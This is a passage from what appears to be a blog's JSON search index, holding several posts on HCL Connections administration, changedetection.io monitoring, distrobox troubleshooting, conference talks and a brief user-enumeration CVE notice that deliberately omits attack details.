Triggers\u0026rdquo; add the xpath selection:\nI use concat here, to combine the three fields in the toot.\nThis selects title, link and description of the newest blog post in the feed. Additionally I start the post with \u0026ldquo;OMB: New article\u0026rdquo;.\nxpath:concat(\u0026#39;New article \u0026#34;\u0026#39;, //item[1]/title,\u0026#39;\u0026#34; published \u0026#39;, //item[1]/link/text(), \u0026#39;. \u0026#39;, //item[1]/description/text()) Enable a mastodon app in changedetection notification I want to use Mastodon just for one entry in Changedetection, so I keep mail notification in my default settings and change notification only for this single entry.\nAccess token The mastodon instance visibility (you can also use direct to include just some users) {{current_snapshot}} {{current_snapshot}} is important, because this contains the output of our xpath from above. I have changed the title of the notification to OMB: now, this appears at the top of the toot.\nFor the last blog post this notification looks like this:\nHope this helps with your notifications, the options of Apprise are really awesome and you can post to any chat app or use ntfy to get an update directly on your mobile.\nDo not spam your mastodon instance! For testing you can send the toot directly just to your own user!\n","excerpt":"\u003cp\u003eIn \u003ca href=\"/posts/2024/changedetection/\"\u003ethe last blogpost\u003c/a\u003e\n I showed how I use an instance of changedetection.io on a Raspberry Pi to monitor and track changes in a ServiceNow portal.\u003c/p\u003e\n\u003cp\u003eMeanwhile, I tweaked this a bit more and found a way how I can monitor the \u003ca href=\"https://stoeps.de/index.xml\" target=\"_blank\"\u003eRSS Feed \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n of my blog to post a toot on mastodon when I created a new blog post.\u003c/p\u003e","ref":"https://stoeps.de/posts/2024/toot-new-blogposts/","title":"Toot new blogposts with changedetection.io"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/toot/","title":"Toot,"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/changedetection/","title":"Changedetection"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/changedetection.io/","title":"Changedetection.io"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/knowledgebase/","title":"Knowledgebase"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/knowledgebase/","title":"Knowledgebase,"},{"body":"The HCL Software knowledge base is built with ServiceNow . You can register and subscribe for channels and documents. You receive mails for new documents and changed documents you have subscribed for.\nThe last five years since HCL migrated to this system, I missed the option to get updates via RSS (maybe I\u0026rsquo;m old, but I still love reading countless updates in my newsreader). Mails about updated documents just tell you that a document with link is updated, but you don\u0026rsquo;t get any information of what has changed in the article.\nPlenty of entries in the knowledge base are so-called defect articles, which describe a known bug, if there is a workaround and most of the time when it will be fixed. When the defect article is released, your support agent will ask you to close the case and follow or subscribe the defect article.\nI\u0026rsquo;m following more than 10 defect articles and mails with the information “this doc has changed” do not help me. It\u0026rsquo;s challenging to track the changes and when there is a delay for a fix, you need to remember if the fix version was different before the change.\nFor some months, I have used changedetection.io , with changedetection I can track all relevant defect articles, updates on fix lists, changelogs and new documents for search terms like \u0026ldquo;8.0CR7\u0026rdquo;. I run changedetection on a Rasperry Pi 4 with docker-compose , but it\u0026rsquo;s also possible to deploy with helm on Kubernetes .\nOn the pi I use the following docker-compose.yml:\nversion: \u0026#39;3.2\u0026#39; services: changedetection: image: ghcr.io/dgtlmoon/changedetection.io container_name: changedetection hostname: changedetection volumes: - changedetection-data:/datastore ports: - 5000:5000 restart: unless-stopped environment: - PLAYWRIGHT_DRIVER_URL=ws://playwright-chrome:3000/?stealth=1\u0026amp;--disable-web-security=true playwright-chrome: hostname: playwright-chrome image: browserless/chrome restart: unless-stopped browser-chrome: hostname: browser-chrome image: seleniarm/standalone-chromium:latest volumes: - /dev/shm:/dev/shm restart: unless-stopped volumes: changedetection-data: Just run docker compose up -d and after some minutes the service is available.\nNow open http://:5000 and start adding interesting URLs.\nI monitor for example:\nHCL knowledge article search - Connections HCL Connections Desktop Plug-ins for Microsoft Windows Connections 8.0 Cumulative Release (CR) List Tiny Editors for HCL Connections Fix List System requirements for HCL Connections 8.0 CR3 and above Then I have added several defect articles which were announced in one of my support cases, but aren\u0026rsquo;t published until now.\nWhich settings do I use within Changedetection.io? Check for changes all eight hours Use 5 minutes jitter between checks Get the title of the page and set it as title in Changedetection You can get notification for a bunch of collaboration tools, here I made an example with mail notification and template. Or you add the rss feed to your feed reader.\nServiceNow is using a lot of JavaScript to render the page, so we have to use the Playwright option here.\nAdd the first page I want to use the 8.0 fix list as an example now. The fix list URL is https://support.hcltechsw.com/csm?id=kb_article\u0026sysparm_article=KB0102882 .\nLet\u0026rsquo;s take a look at the first lines:\nlast updated with days, so this changes each day each time when a new user is watching the document, the counter increases average rating of the document documents matching the content of the open document we want just the content within this border without the points 1, 2 and 3 But changedetection helps us to monitor just the content we want to have.\nWith browser steps and visual filter selector you can select the content you would like to monitor. With browser steps, you can add clicks or run tasks (change sorting, for example).\nI use the following filters, to select the content like this:\nCSS/JSONPath/JQ/XPath Filters: /html/body/div/section/main/div[2]/div/sp-page-row/div/div[1]/span[1]/div/div/div/div[2]/article\nRemove elements:\n.published .views .str-rating .title-secondary-date So now just changes in the text of the defect / knowledge base article will trigger a notification.\nLists and Browser steps The last weeks I got a log of notifications from the lists I follow. Like https://support.hcltechsw.com/csm?id=kb_search\u0026spa=1\u0026language=en\u0026kb_category=432e1eb81b49001483cb86e9cd4bcb32 , I don\u0026rsquo;t know why, but it seemed that the sort order changed multiple times during the day. It could be a cluster issue, but I looked for a way to have always the newest documents on top.\nThe easiest way was using the browser steps:\nHere, you see that the triangle next to Newest shows oldest documents first (descending sort order). I couldn\u0026rsquo;t find a way to change this via cookies or URL parameters. So I built a short JavaScript.\nStart the browser steps, the page loads within 10 or 15 seconds.\nThen add 1. a wait for text: “Applied Filters” step, so the next step only triggers if the page loaded. Next step Execute JavaScript and add if (document.getElementsByClassName('fa-caret-down')[1].offsetParent === null) { document.querySelectorAll('[aria-label=\u0026quot;Sorted by Newest Ascending\u0026quot;]')[0].click() } This clicks on Newest, when the sort order is set to descend (downwards caret hidden). So the sort order is now always Newest first.\nThe deployment on a Raspberry Pi monitors over 50 views and documents from ServiceNow, and I host multiple services on it. Therefore, the whole monitoring needs just a few resources and could also run next to Component Pack.\nWe can now check each change in the diff view, like here in the Desktop plugins document, we see the download link has changed.\nSummary This could be easier, when ServiceNow would support RSS (or HCL activates it), but now I have a reliable system to track changes in the knowledge base and documentation.\n","excerpt":"\u003cp\u003eThe \u003ca href=\"https://support.hcltechsw.com/csm?id=kb_search\" target=\"_blank\"\u003eHCL Software knowledge base \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n is built with \u003ca href=\"https://support.hcltechsw.com/csm?id=kb_search\" target=\"_blank\"\u003eServiceNow \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n. You can register and subscribe for channels and documents. You receive mails for new documents and changed documents you have subscribed for.\u003c/p\u003e","ref":"https://stoeps.de/posts/2024/changedetection/","title":"Monitor HCL Software Knowledgebase for changes"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/opensource/","title":"Opensource"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/opensource/","title":"Opensource,"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/servicenow/","title":"Servicenow"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/servicenow/","title":"Servicenow,"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/apple/","title":"Apple"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/apple/","title":"Apple"},{"body":"Last week I checked some HCL Connections 8 CRx downloads in Flexnet and recognized these packages available since 2024-06-13:\nAPNS (Apple Push Notification Service) certificates renewal for 2025, sounds normal, these updates need to be installed each year. First, I checked for the knowledge base document mentioned in the file name . It\u0026rsquo;s not published until now.\nSo I downloaded the package and extracted the content. The included certificates are valid from\nYou see the certificates are valid from 2024-04-25 to 2025-05-25, so they start and end in the middle of the year. So I got a bit nervous and extracted the certificates of my fresh installed HCL Connections 8.0CR6.\nThe certificates deployed with CR6 are valid until 2024-07-04, so less than two weeks left to update the system, or Apple push notifications stop working.\nMy opened case to ask for details and to publish the missing knowledge base article is pending since Thursday, so I decided to write the blog post. Install the update, or your push notifications stop working on the 4th of July. The filename or description \u0026ldquo;APNS renewals for 2025\u0026rdquo; is misleading, asked to give this a more appropriate description.\nThe update is available for 8.0CR5 and 8.0CR6.\n","excerpt":"\u003cp\u003eLast week I checked some \u003ca href=\"https://hclsoftware.flexnetoperations.com/flexnet/operationsportal/entitledDownloadFile.action?downloadPkgId=HCL_Connections_8.0_CRx\u0026amp;activateId=7335b327-6509-ef11-9f89-000d3a54eb4a\" target=\"_blank\"\u003eHCL Connections 8 CRx downloads \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n in Flexnet and recognized these packages available since 2024-06-13:\u003c/p\u003e","ref":"https://stoeps.de/posts/2024/push-notification-update/","title":"Apple push notification certificates expire on 4th of July 2024"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/certificate/","title":"Certificate,"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/certificates/","title":"Certificates"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/notifications/","title":"Notifications"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/notifications/","title":"Notifications,"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/push/","title":"Push"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/push/","title":"Push,"},{"body":"I showed, in several slides and sessions, how you can use the search-admin role in the search application of HCL Connections for troubleshooting and reviewing some key configurations.\nIn several environments, my user or other administrative users have this role, just to access the link to /search/serverStatus for example.\nHow it started Some years ago, when IBM owned Connections, we had a case, that a user with the search application search-admin role didn\u0026rsquo;t see results in the profiles advanced search. The result was always empty.\nAs it already was after the birth of pink/component pack we decided to close the case, as a new search was already planned and announced.\nSo I forgot about this topic and started again to investigate an issue with profiles advanced search, end of 2023. My finding was that users with search-admin role do not get results in advanced search (/search/web/jsp/advancedSearch.jsp) of Connections. Any search term gives an empty result.\nThe journey Profiles advanced Search in Connections 8 is a bit hidden. Open People \u0026gt; Directory \u0026gt; Display Full search options\nProfiles advanced search Now searching for a given name (example: https://cnx8cr6-db2.stoeps.home/profiles/html/advancedSearch.do?keyword=\u0026displayName=\u0026preferredFirstName=\u0026preferredLastName=jones2\u0026profileTags=\u0026jobResp=\u0026description=\u0026experience=\u0026organizationTitle=\u0026workLocation%24city=\u0026workLocation%24state=\u0026countryDisplayValue=\u0026email=\u0026telephoneNumber= )\nProfiles advanced without search-admin role Profiles advanced with search-admin role After recognizing the root cause, a search in my notes and local documentation, brought up the old case and I opened a new one at HCL support.\nAfter three months of waiting, I got the answer:\nThis is to inform you that the development has gone through the issue. This is working as expected.\nHCL Support Ok, as this behavior seems to be intended, I asked for updated documentation or knowledge base article. I even created a pull request for the Connections 8 documentation.\nSo, two months ago, the page Roles was updated with the wording:\nNote: Users with this role may experience certain limitations with UI-based search functionality.\nHCL Connections 8 documentation I wasn\u0026rsquo;t pleased with this because when something is working as intended, I would clearly state what happens when you assign the role. So I asked for a change. Which was released with CR6 now:\nNote: Granting the search-admin role exclusively for auditing tasks to a user may inadvertently expose restricted content. Consequently, the role is intended to have limitations.\nHCL Connections 8 documentation To be honest, that\u0026rsquo;s even worse. Therefore, there is a role for auditing, but it is built to have limitations. I don\u0026rsquo;t understand! Either I have an audit role (which should get everything), or I have limitations.\nSummary To prevent further time wastage, I\u0026rsquo;m closing the case and jotting down a note to remember this shortcoming. But I don\u0026rsquo;t want to wait any longer for another change or for my proposal to be merged.\nBe aware, when you assign the search-admin role in the search application to a user, the advanced search will not return any result.\nBtw, there is another documentation page Analyzing results from the search serverStatus page , which tells you to set the role for troubleshooting, but also does not contain a warning about the circumstances. Just a recommendation to use a new user for the role.\n","excerpt":"\u003cp\u003eI showed, in several slides and sessions, how you can use the search-admin role in the search application of HCL Connections for troubleshooting and reviewing some key configurations.\u003c/p\u003e\n\u003cp\u003eIn several environments, my user or other administrative users have this role, just to access the link to \u003ccode\u003e/search/serverStatus\u003c/code\u003e for example.\u003c/p\u003e","ref":"https://stoeps.de/posts/2024/search-admin/","title":"Be careful with search-admin role in HCL Connections"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/connections/","title":"Connections,"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/hcl/","title":"Hcl"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/j2ee/","title":"J2ee"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/role/","title":"Role"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/role/","title":"Role,"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/search/","title":"Search,"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/cve/","title":"Cve"},{"body":"Some time back, I stumbled upon a flaw in HCL Connections 7 and 8 that allowed for user enumeration. This flaw could be exploited by anonymous users.\nUser enumeration occurs when an HTML form provides different responses depending on whether a user is registered or not. These responses may vary in content, such as \u0026ldquo;We sent a mail to your registered address\u0026rdquo; versus \u0026ldquo;You don’t have an account,\u0026rdquo; or in HTTP response codes and response times. This vulnerability extends beyond HTML forms and affects APIs as well.\nWhy is user enumeration problematic? User enumeration is identified in the OWASP Top 10 as A07:2021 – Identification and Authentication Failures . When attackers can identify available user accounts on a platform, two potential attack scenarios emerge:\nLDAP servers may lock accounts after a certain number of incorrect password attempts (e.g., Domino with internet password lockout or Active Directory account lockout policy). Consequently, attackers could deliberately block user accounts, leading to a denial of service-like situation.\nIn my observation, most Connections environments directly use Active Directory or other LDAP servers. Thus, if an attacker manages to lock an account, it affects more than just Connections; other services may also be disrupted.\nWithout a lockout policy, attackers can execute brute force attacks on user accounts, attempting to discover valid passwords.\nCredential stuffing, a common tactic, involves utilizing compromised passwords from one service to attempt unauthorized access to other services where the user may have reused the same password. Attackers automate this process, leveraging automated scripts to rapidly test stolen credentials across various platforms, exploiting the common practice of password reuse among users. This method can result in unauthorized access to accounts and pose significant security risks across multiple services.\nPreventing credential stuffing: Avoid reusing passwords for multiple services, as stolen login data can easily be used for other services.\nHow to address this issue: The details of this problem can be found in the Security Bulletin: HCL Connections Security Update for User Enumeration Vulnerability (CVE-2024-23557) , which provides download links and public information regarding the issue.\nI opt not to delve into the specifics of the attack or application details.\nHCL Connections 8: The problem has been resolved in Connections 8.0 CR5 and subsequent versions.\nHCL Connections 7: For Connections 7, you need to deploy the latest CFix.70.2403 along with the additional KB0111309 ifix.\nI recommend installing these fixes, when your Connections environment is accessible from the internet.\n","excerpt":"\u003cp\u003eSome time back, I stumbled upon a flaw in HCL Connections 7 and 8 that allowed for user enumeration. This flaw could be exploited by anonymous users.\u003c/p\u003e","ref":"https://stoeps.de/posts/2024/cve-2024-23557/","title":"CVE-2024-23557 - HCL Connections Security Update for User Enumeration Vulnerability"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/vulnerability/","title":"Vulnerability"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/chemnitz/","title":"Chemnitz"},{"body":"This year marked my inaugural attendance at the Chemnitzer Linuxdays. The experience was fantastic, and I had the pleasure of connecting with numerous intriguing individuals. Chemnitzer Linuxdays stands out as one of the premier events in the Linux and open-source community. With 3,200 attendees this year, participants had the opportunity to engage with a diverse array of topics through 94 talks and hands-on workshops .\nMy talk was about Asciidoctor in Ansible roles and the recording can be viewed with others on media.ccc.de :\nSlides for download and reveal.js version .\nSee some german blog posts about the CLT 24:\nJoerg Kastnig Christian Stankowic ","excerpt":"\u003cp\u003eThis year marked my inaugural attendance at the Chemnitzer Linuxdays. The experience was fantastic, and I had the pleasure of connecting with numerous intriguing individuals. Chemnitzer Linuxdays stands out as one of the premier events in the Linux and open-source community. With 3,200 attendees this year, participants had the opportunity to engage with a diverse array of topics through \u003ca href=\"https://chemnitzer.linux-tage.de/2024/de/programm/vortraege\" target=\"_blank\"\u003e94 talks \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n and \u003ca href=\"https://chemnitzer.linux-tage.de/2024/de/programm/workshops\" target=\"_blank\"\u003ehands-on workshops \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e","ref":"https://stoeps.de/posts/2024/chemnitzer-linuxtage/","title":"Chemnitzer Linuxtage 2024"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/container/","title":"Container,"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/distrobox/","title":"Distrobox"},{"body":"Since end of last year, I use Fedora Silverblue or, better Universal Blue on my notebooks for daily work and my personal projects.\nI will write about Univeral Blue soon, but today just a short solution in Distrobox .\nSo what\u0026rsquo;s distrobox? Use any Linux distribution inside your terminal. Enable both backward and forward compatibility with software and freedom to use whatever distribution you’re more comfortable with. Distrobox uses podman, docker or lilipod to create containers using the Linux distribution of your choice. The created container will be tightly integrated with the host, allowing sharing of the HOME directory of the user, external storage, external USB devices and graphical apps (X11/Wayland), and audio.\nOne of my terminals is based on Kali Linux and some tools in Kali need root access to the host. So it needs to use the --root flag for creating and updating the box.\nYesterday I tried to run the container as non-root, but it did not work. So I wanted to recreate the container.\n/usr/etc/distrobox/distrobox.ini\n[kali] additional_packages=\u0026#34;burpsuite zaproxy bloodhound neo4j\u0026#34; image=ghcr.io/stoeps13/kali-toolbox:latest icon=/home/stoeps/Pictures/Kali-dragon-icon.svg.png init=false nvidia=false pull=true root=true replace=true Create a distrobox: distrobox-assemble create --file /usr/etc/distrobox/distrobox.ini --name kali I got the error:\nskipping unexporting.../usr/bin/distrobox-rm: line 385: sudo podman: command not found The only hit in an internet search was this Reddit post . I added my solution there too.\nI couldn\u0026rsquo;t find a Kali box with distrobox list.\ndistrobox list ID | NAME | STATUS | IMAGE 435ae448145d | ubuntu | Created | ghcr.io/stoeps13/ubuntu-toolbox:latest fa04720cd598 | fedora | Up 4 hours | ghcr.io/stoeps13/fedora-toolbox:latest 55fb083af50a | davinci | Created | ghcr.io/zelikos/davincibox:latest Then I discovered that root containers have to be listed with:\ndistrobox list --root [sudo] password for stoeps: ID | NAME | STATUS | IMAGE 2ba524be58dd | kali | Up 4 hours | ghcr.io/stoeps13/kali-toolbox:latest Fix creation of the box I could delete the found container with\ndistrobox-stop --root kali distrobox-rm --root kali And after removing the running container the command to assemble the updated box worked without issues.\nEntering distroboxes that run with root rights:\ndistrobox enter --root kali ","excerpt":"\u003cp\u003eSince end of last year, I use \u003ca href=\"https://fedoraproject.org/atomic-desktops/silverblue/\" target=\"_blank\"\u003eFedora Silverblue \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n or, better \u003ca href=\"https://universal-blue.org/\" target=\"_blank\"\u003eUniversal Blue \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n on my notebooks for daily work and my personal projects.\u003c/p\u003e","ref":"https://stoeps.de/posts/2024/distrobox-error/","title":"Distrobox can't delete root container"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/distrobox/","title":"Distrobox,"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/immutable/","title":"Immutable"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/toolbox/","title":"Toolbox"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/toolbox/","title":"Toolbox,"},{"body":"You can navigate within the presentation slides with arrow keys, or the icons in the bottom right corner (forward, back).\nChemnitzer Linuxtage \u0026ndash; https://chemnitzer.linux-tage.de/ Die Dokumentation von Software und Umgebungen ist wichtig und erfordert viel Zeit und ständige Anpassungen, wenn sich etwas ändert. In dieser Session lernen Sie, wie Sie Ansible, Jinja2-Templates und Asciidoctor nutzen können, um den Dokumentationsprozess zu automatisieren und trotzdem ansprechende Ergebnisse erzielen zu können.\nMittels Asciidoctor und Pandoc ist auch die Verwendung von Vorlagen und Corporate Identity möglich, und Copy-and-paste in ein Office-Produkt kann umgangen werden.\nDokumentation als Code mit Ansible und Asciidoctor Your browser does not support this, go to the presentation directly: [media.ccc.de](https://media.ccc.de/v/clt24-214-dokumentation-als-code-mit-ansible-und-asciidoctor) FrOSCon \u0026ndash; https://froscon.org Next-Gen Desktops: Ublue-OS immutable desktop Der Vortrag präsentiert den Immutable Desktop mit Ublue-OS als wegweisende Entwicklung im Bereich des Desktop-Computings. Ublue-OS bootet direkt in einen OCI-Container, was die Erstellung eines immuntable Desktops vereinfacht und für eine robuste Sicherheit und Stabilität sorgt. Durch die Trennung von Betriebssystem und Anwendungen mittels Technologien wie Flatpak sowie die Integration von Distrobox für die nahtlose Verwaltung von Anwendungen, bietet der Immutable Desktop eine sichere, stabile und benutzerfreundliche Desktop-Umgebung. Praktische Demonstrationen verdeutlichen die einfache Erstellung und Anpassung des Desktops sowie die Durchführung von Updates und Rollbacks. Der Vortrag zeigt auf, wie Ublue-OS den Brückenschlag zwischen Desktop und Cloud-Technologien vollzieht und somit die Zukunft des Desktop-Computings maßgeblich gestaltet.\nNext-Gen Desktops: Ublue-OS immutable desktop Next-Gen Desktops: Ublue-OS immutable desktop Enterprise IT - ein agiler Realitätsabgleich In der turbulenten Welt der Unternehmens-EDV treffen absurde Regeln auf innovative Selbstschutzmechanismen der MitarbeiterInnen. Die (Miss)Kommunikation innerhalb eines großen Unternehmens hat oft System. Jobausschreibungen werden mit Hilfe von LLMs auf Basis von ein paar Wortfetzen aus dem letzten 4-Stunden-Standup formuliert und ohne Sanity-Check online gestellt. Klingt das interessant, unterhaltsam oder sogar vertraut (unser Beileid!!)? Dann ist diese Session für Dich!\n","excerpt":"\u003cp\u003eYou can navigate within the presentation slides with arrow keys, or the icons in the bottom right corner (forward, back).\u003c/p\u003e\n\u003ch2 id=\"chemnitzer-linuxtage-\"\u003eChemnitzer Linuxtage \u0026ndash; \u003ca href=\"https://chemnitzer.linux-tage.de/\" target=\"_blank\"\u003ehttps://chemnitzer.linux-tage.de/ \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n \u003ca href=\"#chemnitzer-linuxtage-\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cp\u003eDie Dokumentation von Software und Umgebungen ist wichtig und erfordert viel Zeit und ständige Anpassungen, wenn sich etwas ändert. In dieser Session lernen Sie, wie Sie Ansible, Jinja2-Templates und Asciidoctor nutzen können, um den Dokumentationsprozess zu automatisieren und trotzdem ansprechende Ergebnisse erzielen zu können.\u003c/p\u003e\n\u003cp\u003eMittels Asciidoctor und Pandoc ist auch die Verwendung von Vorlagen und Corporate Identity möglich, und Copy-and-paste in ein Office-Produkt kann umgangen werden.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/clt-2024/2024-clt-docsascode.html\" target=\"_blank\"\u003eDokumentation als Code mit Ansible und Asciidoctor \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \u003ci class=\"lab la-html5 la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/germany.png\"/\u003e\n \n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ciframe width=\"1024\" height=\"576\" src=\"https://media.ccc.de/v/clt24-214-dokumentation-als-code-mit-ansible-und-asciidoctor/oembed\" frameborder=\"0\" allowfullscreen sandbox=\"allow-scripts allow-same-origin allow-popups allow-forms\" allow=\"fullscreen\" loading=\"lazy\"\u003e\nYour browser does not support this, go to the presentation directly: [media.ccc.de](https://media.ccc.de/v/clt24-214-dokumentation-als-code-mit-ansible-und-asciidoctor)\n\u003c/iframe\u003e\n\u003ch2 id=\"froscon-\"\u003eFrOSCon \u0026ndash; \u003ca href=\"https://froscon.org\" target=\"_blank\"\u003ehttps://froscon.org \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n \u003ca href=\"#froscon-\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003ch3 id=\"next-gen-desktops-ublue-os-immutable-desktop\"\u003eNext-Gen Desktops: Ublue-OS immutable desktop \u003ca href=\"#next-gen-desktops-ublue-os-immutable-desktop\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h3\u003e\n\n\u003cp\u003eDer Vortrag präsentiert den Immutable Desktop mit Ublue-OS als wegweisende Entwicklung im Bereich des Desktop-Computings. Ublue-OS bootet direkt in einen OCI-Container, was die Erstellung eines immuntable Desktops vereinfacht und für eine robuste Sicherheit und Stabilität sorgt. Durch die Trennung von Betriebssystem und Anwendungen mittels Technologien wie Flatpak sowie die Integration von Distrobox für die nahtlose Verwaltung von Anwendungen, bietet der Immutable Desktop eine sichere, stabile und benutzerfreundliche Desktop-Umgebung. Praktische Demonstrationen verdeutlichen die einfache Erstellung und Anpassung des Desktops sowie die Durchführung von Updates und Rollbacks. Der Vortrag zeigt auf, wie Ublue-OS den Brückenschlag zwischen Desktop und Cloud-Technologien vollzieht und somit die Zukunft des Desktop-Computings maßgeblich gestaltet.\u003c/p\u003e","ref":"https://stoeps.de/speaking/2024/","title":"Talks 2024"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/hcl/","title":"Hcl,"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/hclcnx/","title":"Hclcnx,"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/hclconnections/","title":"Hclconnections,"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/orient-web-client/","title":"Orient-Web-Client"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/orient-web-client/","title":"Orient-Web-Client,"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/orientme/","title":"Orientme"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/orientme/","title":"Orientme,"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/top/","title":"Top"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/top-updates/","title":"Top Updates"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/top-updates/","title":"Top-Updates"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/topupdates/","title":"Topupdates"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/topupdates/","title":"Topupdates,"},{"body":"Last week, I had three systems with issues displaying the Top Updates in the Orient Me. So I tried to find out which applications and containers are involved in generating the content for this view.\nFirst, we need to know that Top Updates are part of the Component Pack, and the content of Latest Updates is the Activity stream data, which is read from the homepage database.\nScreenshot of the Connections 8 Homepage If the Top Updates tab is not visible after deploying the Component Pack, check LotusConnections-config.xml; the serviceReference for orientme needs to be enabled. There is only one serviceReference allowed for an application in this file, so check for duplicate definitions when the tab is still missing.\n\u0026lt;!--Uncomment the following serviceReference definition if OrientMe feature is enabled--\u0026gt; \u0026lt;!-- BEGIN Enabling OrientMe --\u0026gt; \u0026lt;sloc:serviceReference bootstrapHost=\u0026#34;cnx8-db2-was.stoeps.home\u0026#34; bootstrapPort=\u0026#34;admin_replace\u0026#34; clusterName=\u0026#34;\u0026#34; enabled=\u0026#34;true\u0026#34; serviceName=\u0026#34;orient\u0026#34; ssl_enabled=\u0026#34;true\u0026#34;\u0026gt; \u0026lt;sloc:href\u0026gt; \u0026lt;sloc:hrefPathPrefix\u0026gt;/social\u0026lt;/sloc:hrefPathPrefix\u0026gt; \u0026lt;sloc:static href=\u0026#34;http://cnx8-db2-was.stoeps.home\u0026#34; ssl_href=\u0026#34;https://cnx8-db2-was.stoeps.home\u0026#34;/\u0026gt; \u0026lt;sloc:interService href=\u0026#34;https://cnx8-db2-was.stoeps.home\u0026#34;/\u0026gt; \u0026lt;/sloc:href\u0026gt; \u0026lt;/sloc:serviceReference\u0026gt; \u0026lt;!-- END Enabling OrientMe --\u0026gt; So where is the data for Top Updates stored? The data for Top Updates is read from the Opensearch/Elasticsearch index orient-me-collection. The data is processed first in WebSphere (/search/eventTracker) and sent through the SIB message store.\nThen the message store publication point connections.events exports to Redis (redis-server:30379 via the haproxy-redis service) on Kubernetes. The indexing-service reads the Redis data and writes to the Opensearch orient-me-collection index.\nI\u0026rsquo;m not 100% sure, but I expect that the retrievalservice and middleware-graphql pods are involved in reading the data for Top Updates. The GraphQL query is processed through orient-web-client.\nDependencies and troubleshooting steps Flow of Homepage Lastest Updates and Top Updates So the first step is to check if the events are written to the Opensearch index. Open a shell in the opensearch-cluster-client-0 and switch to the folder probe. Make a copy of sendRequest.sh and change the last print statement:\ncd probe cp sendRequest.sh send.sh vi send.sh Change line 27 to (add \u0026quot;\u0026quot; around the variable), this will print the output with newlines instead of one long string:\necho \u0026#34;${response_text}\u0026#34; Now let\u0026rsquo;s check the index:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 ./send.sh GET /_cat/indices [opensearch@opensearch-cluster-client-0 probe]$ ./send.sh GET /_cat/indices % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 810 100 810 0 0 6793 0 --:--:-- --:--:-- --:--:-- 6864 green open icmetricsconfig daEZC8iTRESjm8VbM7hH_g 5 1 1 0 9kb 4.5kb green open .opensearch-observability B58L49_sR7-h8eyjGXhxzA 1 2 0 0 624b 208b green open icmetrics_a_2023_2h Ngqg9EK4SF6Sk2VJOojtzw 5 1 960 0 1.3mb 697.5kb green open quickresults yewsBz9xQD24ljamtPdDaw 8 2 145 25 2.2mb 794.9kb green open icmetricscommlist BbybBZFFS9m18RS7l9bNsQ 5 1 1 0 10kb 5kb green open 